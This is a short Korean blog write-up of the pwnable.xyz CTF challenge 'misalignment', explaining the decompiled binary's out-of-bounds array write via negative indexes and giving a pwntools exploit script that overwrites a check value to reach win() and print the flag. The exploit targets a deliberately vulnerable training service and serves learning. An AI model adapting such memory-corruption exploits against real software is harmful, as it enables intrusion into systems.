ii4gsp
pwnable.xyz - misalignment 본문
파일을 다운로드 해주자.
IDA로 열어보면 v5 + 7에 0xDEADBEEF를 넣고
scanf()함수로 v6, v7, v8에 입력을받는다.
v5[v8 + 6]에 v6과 v7을 더한 값을 저장하고, 값을 출력한다.
v5 + 7이 0xB000000B5면 win()함수를 실행하여 flag를 출력해준다.
v5[0]에 -5,404,319,552,844,595,200을 입력해주고 v5[1]에 184,549,376을 입력해주면 된다.
Exploit
from pwn import *
r = remote("svc.pwnable.xyz", 30003)
r.sendline("-5404319552844595200 0 -6")
r.sendline("184549376 0 -5")
r.sendline("asd")
r.interactive()
'시스템 해킹 > pwnable.xyz' 카테고리의 다른 글
| pwnable.xyz - note (0) | 2020.03.02 |
|---|---|
| pwnable.xyz - GrownUp (0) | 2020.03.01 |
| pwnable.xyz - add (0) | 2020.02.08 |
| pwnable.xyz - sub (0) | 2020.02.08 |
| pwnable.xyz - Welcome (0) | 2020.02.08 |
'시스템 해킹/pwnable.xyz' Related Articles
more
Comments